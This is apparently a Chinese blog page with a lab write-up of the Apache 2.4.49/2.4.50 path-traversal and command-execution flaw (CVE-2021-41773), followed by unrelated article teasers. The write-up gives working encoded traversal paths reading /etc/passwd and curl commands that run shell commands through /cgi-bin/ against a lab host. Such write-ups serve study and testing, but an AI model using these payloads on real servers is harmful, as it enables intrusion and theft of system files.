当前位置：首页 > news >正文

中间件安全（三）

news 2025/10/15 6:59:31

本文仅作为学习参考使用，本文作者对任何使用本文进行渗透攻击破坏不负任何责任。

前言:

本文主要讲解apache命令执行漏洞（cve_2021_41773）。

靶场链接：Vulfocus 漏洞威胁分析平台

一，漏洞简介。

cve_2021_41773漏洞是一个目录穿越的高危漏洞，主要影响版本有：Apache（阿帕奇） 2.4.49 和 Apache 2.4.50；其对路径规范化所做的更改中存在一个路径穿越漏洞，攻击者可利用该漏洞读取到Web目录外的其他文件，如系统配置文件、网站源码等，甚至在特定情况下，攻击者可构造恶意请求执行命令，控制服务器。

二，poc。

具体poc已给出：

get传参方式poc为：

/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

可以看到是一段经过了url编码的内容，解密后为：

2，post传参：

/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

经过两次url解码后，结果为：

三，漏洞利用。

打开靶场连接后，可以发现是一个阿帕奇服务的默认界面。

通过抓包后发现，传参方式为get：

此处使用get传参的poc。

进行攻击测试（poc填写到红框内）：

可以看到，回显为修改请求头所读的敏感信息。

此处为什么要用burp，因为浏览器自动对路径进行了一次url解码，用burp发送过去的请求，不会被自动解码

‍四，rce。

1，查看敏感文件。

在kali上使用curl 命令进⾏进一步渗透工作。

读取敏感文件的命令为：

 curl -v --path-as-is http://[ip]:port/icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd

① [ip] 替换成被攻击服务器的 IP。

② port 替换为被攻击服务器端⼝。

curl简介：Linux命令行工具：curl详解（与服务器之间传输数据）_curl socks5代理-CSDN博客

2，通用操作。

具体格式为：

 curl --data "echo;shell" http://123.58.224.8:27400/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh

替换shell为想要执行的命令。

取得敏感信息，查询一下当前用户：

 curl --data "echo;whoami" http://123.58.224.8:27400/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh

查看一下当前目录：

 curl --data "echo;pwd"  http://123.58.224.8:27400/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh

获取flag：

curl --data  "echo;ls /tmp"   http://123.58.224.8:27400/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh

中间件安全（三）

本文仅作为学习参考使用，本文作者对任何使用本文进行渗透攻击破坏不负任何责任。前言: 本文主要讲解apache命令执行漏洞（cve_2021_41773）。靶场链接：Vulfocus 漏洞威胁分析平台一，漏洞简介。 cve_2021_41773漏洞…...

编程日记 2024/10/31 2:29:13

唱戏机上的内存卡怎么加密？教你两个方法

唱戏机是中老年人群休闲时光的好伴侣。然而，很多唱戏机商家都会面临一个困扰：如何保护唱戏机上内存卡中的音频，避免他人随意复制呢？今天这篇文章看完，问题将迎刃而解~ 数据隐藏将内存卡插到电脑上，对卡里…...

编程日记 2024/10/31 2:28:11

MyBatis 源码分析 - SQL执行过程（三）之 ResultSetHandler

MyBatis的SQL执行过程在前面一系列的文档中，我已经分析了 MyBatis 的基础支持层以及整个的初始化过程，此时 MyBatis 已经处于就绪状态了，等待使用者发号施令了那么接下来我们来看看它执行SQL的整个过程，该过程比较复杂&#xff…...

编程日记 2024/10/31 2:27:09

webpack解决使用window.open方法打开history路由页面提示404的问题

问题: 一般情况下应该使用history.push(/ssh)打开history路由页面但项目中使用window.open(/ssh),然后使用new WebSocket进行通信开发环境下启动项目后,/ssh页面打开却显示cannot get /ssh,控制台提示404 排查问题: 在React开发环境中使用 window.open 打开路由页面时&a…...

编程日记 2024/10/31 2:25:06

怎么把视频的声音转化为文字免费？7个小妙招，视频转文字轻松解决！

您是否也曾在做会议记录时，希望能免费把视频的声音转化为文字呢？在如今我们的办公生活中，用视频记录会议、记录的生活似乎已经成为了我们一项必备技能，但也并非所有人都能轻松获取视频中的信息。尤其是有着听力障碍的人群&#xf…...

编程日记 2024/10/31 2:24:05

【无标题】2024年第五届 MathorCup 数学应用挑战赛——大数据竞赛赛题

2024年第五届 MathorCup 数学应用挑战赛——大数据竞赛赛题已发布~，本届初赛时间为：2024年10月25日18:00至2024年11月1日20:00。本次赛题分为A，B两道，所有参赛队从赛道 A、B 中任选一题作答。在报名系统内选择自己队伍的赛道时&am…...

编程日记 2024/10/31 2:23:04

新能源行业必会基础知识---电力现货问答---第9问---什么是输电权？什么是输电权市场？

新能源行业必会基础知识-----电力现货问答-----主目录-----持续更新https://blog.csdn.net/grd_java/article/details/142909208 虽然这本书已经出来有几年了，现货市场已经产生了一定变化，但是原理还是相通的。还是推荐大家买来这本书进行阅读观看&#…...

编程日记 2024/10/31 2:19:59

视频文案素材获取渠道分享

做视频时为文案发愁？别担心！今天为大家推荐几个实用的视频文案素材网站，让你灵感爆棚，轻松创作文案。蛙学网首先要推荐的是蛙学网。作为专业短视频素材库，不仅有修牛蹄、解压视频等热门素材，还为短视频创…...

编程日记 2024/10/31 2:18:57

尚硅谷-react教程-求和案例-数据共享(下篇)-完成数据共享-笔记

#1024程序员节｜征文# public/index.html <!DOCTYPE html> <html><head><meta charset"UTF-8"><title>redux</title></head><body><div id"root"></div></body> </html&…...

编程日记 2024/10/31 2:17:56

VB中如何创建和使用自定义控件

在Visual Basic（VB）中，创建和使用自定义控件是一个高级功能，它允许开发者根据特定需求创建具有独特行为和外观的控件。以下是在VB中创建和使用自定义控件的一般步骤： 一、创建自定义控件打开VB开发环境： …...

编程日记 2024/10/31 2:16:55

Java继承的super关键字

在Java中，super关键字用于调用父类的构造方法、访问父类的成员变量和成员方法。调用父类的构造方法： 在子类的构造方法中，可以使用super关键字来调用父类的构造方法。这可以帮助子类初始化从父类继承的属性。调用父类的构造方法要使用以下语…...

编程日记 2024/10/31 2:14:54

3D点云与2D图像的相互转换：2D图像对应像素的坐标转为3D空间的对应坐标

2d ----> 3d 对应像素到空间坐标的转换参考：深度相机，通过2d检测得到目标坐标系的3d检测框_深度图到相机坐标-CSDN博客...

编程日记 2024/10/31 2:13:53

查找算法简记

一、简单查找（顺序查找） 最基本的查找，相当于遍历，从头到尾一个一个找。二、二分查找 1、简述二分查找的输入是一个有序的元素列表。如果要查找的元素包含在列表中，二分查找返回其位置； 否则返回null。…...

编程日记 2024/10/31 2:10:47

算法竞赛（Python）-状态间的奇妙转移（动态规划）

文章目录一、初探动态规划1 拼图游戏（从搜索到动态规划）2 物流仓库——状态的转移二、状态的巧妙定义1 不同的状态和转移2 流浪猫的家——状态压缩与状态剪枝三转移方式的神奇优化1 运输计划——在转移中剪枝2 会议安排——在决策中剪枝三、经典的动…...

编程日记 2024/10/31 2:09:46

String.format() 用法详解

**String.format()详解示例：**import java.util.Date; /** String.format() 格式化 / public class format { /* 字符串占位符类型%s 字符串类型%c 字符类型%b 布尔类型%d 整数类型（十进制）%x 整数类型（十六进制）%o …...

编程日记 2024/10/31 2:08:45

es 常用命令(已亲测)

说明： elastic:1235 账号:密码 _isShare ： 字段 1、根据一个参数查询es curl -XGET -u elastic:1235 http://10.223.73.3:9200/catalog/_search \ -H Content-Type: application/json \ -d {"query":{"match":{"_isShar…...

编程日记 2024/10/31 2:06:43

RabbitMQ 高级特性——事务

文章目录前言事务配置事务管理器加上Transactional注解前言前面我们学习了 RabbitMQ 的延迟队列，通过延迟队列可以实现生产者生产的消息不是立即被消费者消费。那么这篇文章我们将来学习 RabbitMQ 的事务。事务 RabbitMQ 是基于 AMQP 协议实现的，…...

编程日记 2024/10/31 2:05:41

HCIP-HarmonyOS Application Developer V1.0 笔记（二）

类Web开发范式自定义组件基本用法自定义组件通过element引入到宿主页面。 Props自定义属性自定义属性支持类型 String，Number，Boolean，Array，Object。命名规范： 命名时禁止以on、、on:、grab:等保留关键字为开头…...

编程日记 2024/10/31 2:03:39

初体验鸿蒙 HarmonyOS NEXT开发

上个星期三就下载了鸿蒙 HarmonyOS NEXT，安装好了后测试了一下，感觉界面和功能设计与IntelliJ IDEA很像，对初学者非常友好，所见即所得。不知道什么原因，写了代码后测试起来很慢，简单测试后就没有再动。今天…...

编程日记 2024/10/31 2:01:37

MySQL---主从复制和读写分离

文章目录 MySQL---主从复制和读写分离主从复制mysql主从复制的作用mysql主从复制的分类mysql主从复制原理mysql主从复制的配置步骤mysql主从复制的同步模式在什么情况下半同步复制会将为异步复制？mysql主从复制不一致问题如何解决？mysql主从复制延迟问题…...

编程日记 2024/10/31 2:00:36

【大模型RAG】拍照搜题技术架构速览：三层管道、两级检索、兜底大模型

摘要拍照搜题系统采用“三层管道（多模态 OCR → 语义检索 → 答案渲染）、两级检索（倒排 BM25 向量 HNSW）并以大语言模型兜底”的整体框架： 多模态 OCR 层将题目图片经过超分、去噪、倾斜校正后，分别用…...

编程新知 2025/10/13 16:33:59

RocketMQ延迟消息机制

两种延迟消息 RocketMQ中提供了两种延迟消息机制指定固定的延迟级别通过在Message中设定一个MessageDelayLevel参数，对应18个预设的延迟级别指定时间点的延迟级别通过在Message中设定一个DeliverTimeMS指定一个Long类型表示的具体时间点。到了时间点后&#xf…...

编程新知 2025/10/14 13:22:03

DeepSeek 赋能智慧能源：微电网优化调度的智能革新路径

目录一、智慧能源微电网优化调度概述1.1 智慧能源微电网概念1.2 优化调度的重要性1.3 目前面临的挑战二、DeepSeek 技术探秘2.1 DeepSeek 技术原理2.2 DeepSeek 独特优势2.3 DeepSeek 在 AI 领域地位三、DeepSeek 在微电网优化调度中的应用剖析3.1 数据处理与分析3.2 预测与…...

编程新知 2025/6/15 19:07:20

1 方法一先用方法 keySet() 获取集合中的所有键。再通过 gey(key) 方法用对应键获取值 import java.util.HashMap; import java.util.Set;public class Test {public static void main(String[] args) {HashMap hashMap new HashMap();hashMap.put("语文",99);has…...

编程新知 2025/10/10 10:43:25